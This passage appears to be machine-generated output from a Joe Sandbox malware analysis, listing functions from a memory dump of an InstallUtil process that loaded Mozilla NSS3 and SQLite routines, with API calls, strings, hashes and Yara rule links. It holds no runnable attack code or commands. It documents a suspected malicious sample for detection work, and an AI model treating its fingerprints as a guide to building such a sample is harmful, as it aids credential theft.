                                                                                                                    • Part of subcall function 6C7652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C7BF1E9,?,00000000,?,?), ref: 6C7652F5
                                                                                                                    • Part of subcall function 6C7652D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C76530F
                                                                                                                    • Part of subcall function 6C7652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C765326
                                                                                                                    • Part of subcall function 6C7652D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C7BF1E9,?,00000000,?,?), ref: 6C765340
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BF227
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C7BF23E
                                                                                                                    • Part of subcall function 6C7ABE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C75E708,00000000,00000000,00000004,00000000), ref: 6C7ABE6A
                                                                                                                    • Part of subcall function 6C7ABE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7604DC,?), ref: 6C7ABE7E
                                                                                                                    • Part of subcall function 6C7ABE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7ABEC2
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7BF2BB
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7BF3A8
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7BF3B3
                                                                                                                    • Part of subcall function 6C762D20: PK11_DestroyObject.NSS3(?,?), ref: 6C762D3C
                                                                                                                    • Part of subcall function 6C762D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C762D5F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1559028977-0
                                                                                                                  • Opcode ID: 3ceb359c020ebbbb4e467cd3d767d6d83a274ab14774f52947b2073a6bacdb10
                                                                                                                  • Instruction ID: f2c1e025ebbc235025645cc343036a66a4e1f5480ad7357349e6ce85a76c291f
                                                                                                                  • Opcode Fuzzy Hash: 3ceb359c020ebbbb4e467cd3d767d6d83a274ab14774f52947b2073a6bacdb10
                                                                                                                  • Instruction Fuzzy Hash: 29D19EBAE016059FEB10CFA9DA84A9EB7F5EF48708F148139E915B7711E731E806CB50
                                                                                                                  Function 6C780EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_PubDeriveWithKDF.NSS3 ref: 6C780F8D
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C780FB3
                                                                                                                  • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C781006
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C78101C
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C781033
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C78103F
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C781048
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C78108E
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7810BB
                                                                                                                  • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7810D6
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C78112E
                                                                                                                    • Part of subcall function 6C781570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7808C4,?,?), ref: 6C7815B8
                                                                                                                    • Part of subcall function 6C781570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7808C4,?,?), ref: 6C7815C1
                                                                                                                    • Part of subcall function 6C781570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78162E
                                                                                                                    • Part of subcall function 6C781570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C781637
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1510409361-0
                                                                                                                  • Opcode ID: 7f81cea29a9308c93b0c9297ab53a271f4319c94e71e7b10db03b5a62a4df388
                                                                                                                  • Instruction ID: c32a86da2af188a82dffbe827e7d903c6651294cc935c152d1e0212cdb52bf17
                                                                                                                  • Opcode Fuzzy Hash: 7f81cea29a9308c93b0c9297ab53a271f4319c94e71e7b10db03b5a62a4df388
                                                                                                                  • Instruction Fuzzy Hash: 5371D1B1E012058FDB00CFA5DE88A6AB7B0FF44318F14863CEA2997B11E731D945CB91
                                                                                                                  Function 6C7A6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C3F
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C60
                                                                                                                  • PR_ExplodeTime.NSS3(00000000,6C751C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                  • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                  • API String ID: 3534712800-180463219
                                                                                                                  • Opcode ID: acaa5567f69c845bca725e7a9b5f6d5e36d30a9e1e73aea2afb501edf96c5a08
                                                                                                                  • Instruction ID: d9f97aa36a063dae199c16c2c06a703c780b5a78eb4602a00a1b6312944a2dc0
                                                                                                                  • Opcode Fuzzy Hash: acaa5567f69c845bca725e7a9b5f6d5e36d30a9e1e73aea2afb501edf96c5a08
                                                                                                                  • Instruction Fuzzy Hash: D4516B72B016494FC718CEADDC526DAB7DAABA4310F48C23AE442DB785D638E906C751
                                                                                                                  Function 6C820F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C821027
                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8210B2
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C821353
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$strlen
                                                                                                                  • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                  • API String ID: 2619041689-2155869073
                                                                                                                  • Opcode ID: 3329b6cfc48fa2be2d4b6151b2e942900a26a863dc21c3cf074c78e29bcc21e3
                                                                                                                  • Instruction ID: b9f2525cfdd3d7a9a7751bb4a6275b2f45c62189ac020ac11e4d4e2604191d5e
                                                                                                                  • Opcode Fuzzy Hash: 3329b6cfc48fa2be2d4b6151b2e942900a26a863dc21c3cf074c78e29bcc21e3
                                                                                                                  • Instruction Fuzzy Hash: 1EE190715083809FD724CF18C588A6BBBF1AF85348F248D2DF98587B51D77AE885CB82
                                                                                                                  Function 6C828FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C828FEE
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8290DC
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C829118
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82915C
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8291C2
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C829209
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                  • String ID: 3333$UUUU
                                                                                                                  • API String ID: 1967222509-2679824526
                                                                                                                  • Opcode ID: e83af0f653b27ccd2b88480d6bc54d81e8b66ffd8eacd074e644705f085ccc8b
                                                                                                                  • Instruction ID: b6e981f1d144650dfc72866806c4abe76d0e50735e4a73a49e5beb91f56914a0
                                                                                                                  • Opcode Fuzzy Hash: e83af0f653b27ccd2b88480d6bc54d81e8b66ffd8eacd074e644705f085ccc8b
                                                                                                                  • Instruction Fuzzy Hash: 02A1D072E001199BDB14CB69CD94B9EB7B5BF88324F094139D905A7741E73AEC41CBE0
                                                                                                                  Function 6C6E0FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C6DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C73F9C9,?,6C73F4DA,6C73F9C9,?,?,6C70369A), ref: 6C6DCA7A
                                                                                                                    • Part of subcall function 6C6DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCB26
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C6E103E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6E1139
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6E1190
                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C6E1227
                                                                                                                  • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C6E126E
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C6E127F
                                                                                                                  Strings
                                                                                                                  • delayed %dms for lock/sharing conflict at line %d, xrefs: 6C6E1267
                                                                                                                  • winAccess, xrefs: 6C6E129B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                  • API String ID: 2733752649-1873940834
                                                                                                                  • Opcode ID: 41f5a8a0d311fea0de3efbd06a1425f05854f26b7b3beb1e6808131024c9a17c
                                                                                                                  • Instruction ID: 81d5e59c4007fc30d806914d6ef7f3dbecd5bb8e2824108921abea39ade69af9
                                                                                                                  • Opcode Fuzzy Hash: 41f5a8a0d311fea0de3efbd06a1425f05854f26b7b3beb1e6808131024c9a17c
                                                                                                                  • Instruction Fuzzy Hash: 1E713C3170E2059FDB249F65EC95AAE3375FB8A318F14063AE81187A92DB30D841D7DA
                                                                                                                  Function 6C6EAEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C80CF46,?,6C6DCDBD,?,6C80BF31,?,?,?,?,?,?,?), ref: 6C6EB039
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31), ref: 6C6EB090
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31), ref: 6C6EB0A2
                                                                                                                  • CloseHandle.KERNEL32(?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31,?,?,?,?,?,?,?,?,?), ref: 6C6EB100
                                                                                                                  • sqlite3_free.NSS3(?,?,00000002,?,6C80CF46,?,6C6DCDBD,?,6C80BF31,?,?,?,?,?,?,?), ref: 6C6EB115
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31), ref: 6C6EB12D
                                                                                                                    • Part of subcall function 6C6D9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6EC6FD,?,?,?,?,6C73F965,00000000), ref: 6C6D9F0E
                                                                                                                    • Part of subcall function 6C6D9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C73F965,00000000), ref: 6C6D9F5D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3155957115-0
                                                                                                                  • Opcode ID: eef1fec3e8105ee5c9acd4f27e36e0577e51164344722409b58146487328f70c
                                                                                                                  • Instruction ID: 155413987713de3fd5090fcc820c7b755e4348292ade3b47ca4fc6c4ffd7a46e
                                                                                                                  • Opcode Fuzzy Hash: eef1fec3e8105ee5c9acd4f27e36e0577e51164344722409b58146487328f70c
                                                                                                                  • Instruction Fuzzy Hash: A291E4B0A093068FDB14CF64D884AAB77B1FF89308F14463EE41697B51EB30E441CB99
                                                                                                                  Function 6C868D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_CallOnce.NSS3(6C8B14E4,6C81CC70), ref: 6C868D47
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C868D98
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C868E7B
                                                                                                                  • htons.WSOCK32(?), ref: 6C868EDB
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C868F99
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C86910A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                  • String ID: %u.%u.%u.%u
                                                                                                                  • API String ID: 1845059423-1542503432
                                                                                                                  • Opcode ID: 714048addc039756e4c6389056daa3d1c9ae424e6e5c155c0784d2dba842e209
                                                                                                                  • Instruction ID: 08644c907785201c5740e350e8c1bef3be6c7a7aea626ddcf67e271780d2f6ff
                                                                                                                  • Opcode Fuzzy Hash: 714048addc039756e4c6389056daa3d1c9ae424e6e5c155c0784d2dba842e209
                                                                                                                  • Instruction Fuzzy Hash: FE02B9319052558FDB348F1AC668766BBB2EF43304F298A9AC8955FFD1C339D945C390
                                                                                                                  Function 6C80A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C82C3A2,?,?,00000000,00000000), ref: 6C80A528
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C80A6E0
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C80A71B
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C80A738
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C80A6D4
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C80A6CA
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C80A6D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 622669576-598938438
                                                                                                                  • Opcode ID: b5ab90feabac753c1f108c77a8355c2da9af0ba6c387dcca1ab963d451a5f092
                                                                                                                  • Instruction ID: d713232562ae5e65abe0be67015c7e304f08e7bf006390e6f725d1a4297e7ede
                                                                                                                  • Opcode Fuzzy Hash: b5ab90feabac753c1f108c77a8355c2da9af0ba6c387dcca1ab963d451a5f092
                                                                                                                  • Instruction Fuzzy Hash: 3B91F2717087018BC724CF69C980AAAB7F1BF49714F454E6DE8958BB91EB30EC44CB82
                                                                                                                  Function 6C7E68E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_GetIdentitiesLayer.NSS3 ref: 6C7E68FC
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C7E6924
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190AB
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190C9
                                                                                                                    • Part of subcall function 6C819090: EnterCriticalSection.KERNEL32 ref: 6C8190E5
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819116
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C81913F
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C7E693E
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E6977
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E69B8
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C7E6B1E
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C7E6B39
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E6B62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
